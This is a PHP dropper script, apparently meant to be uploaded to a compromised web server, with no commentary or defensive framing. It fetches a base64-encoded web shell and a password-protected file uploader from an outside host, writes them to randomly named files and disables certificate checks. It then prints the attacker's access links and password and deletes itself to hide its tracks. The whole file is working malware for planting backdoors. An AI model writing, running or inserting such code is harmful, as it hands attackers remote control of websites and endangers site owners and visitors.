<?php
# 383634
$shell_encrypted = curl('https://bdkar.top/shl/fox-bdkr-shel.txt');
$shell = base64_decode($shell_encrypted);
$link = str_replace(basename(__FILE__), '', 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
$file1_name = mt_rand_str(8); // Generate random name for shell
$file1 = 'BDKR28_' . $file1_name . '.php';
$file2_name = mt_rand_str(8); // Generate random name for uploader
$file2 = $file2_name . '.php';
$password = mt_rand_str(4);
$save = fopen($file1, 'w');
fwrite($save, $shell);
fclose($save);
$uploader = curl('https://bdkar.top/shl/uploader-pass.txt');
$uploader = str_replace('RANDOM_PASSWORD', $password, $uploader);
$save = fopen($file2, 'w');
fwrite($save, $uploader);
fclose($save);

$txt_url = "https://bdkar.top/shl/bdkr.txt";
$txt_content = curl($txt_url);
$txt_file = fopen("BDKR.txt", "w");
fwrite($txt_file, $txt_content);
fclose($txt_file);

function mt_rand_str($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
    for ($s = '', $cl = strlen($c) - 1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
    return $s;
}

function curl($url) {
    $html = file_get_contents($url);
    if (!empty($html)) {
        return $html;
    }
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_TIMEOUT, 40);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE);
    if (stristr($url, "https://")) {
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    }
    curl_setopt($curl, CURLOPT_HEADER, false);
    return curl_exec($curl);
}
?>
<shell><font color="red"><center> Shell : <?php echo $link . $file1; ?></center></font><br></shell>
<up><font color="green"><center> Up : <?php echo $link . $file2 . '?BDKR28=' . $password; ?></center></font><br></up>
<?php unlink(__FILE__); ?>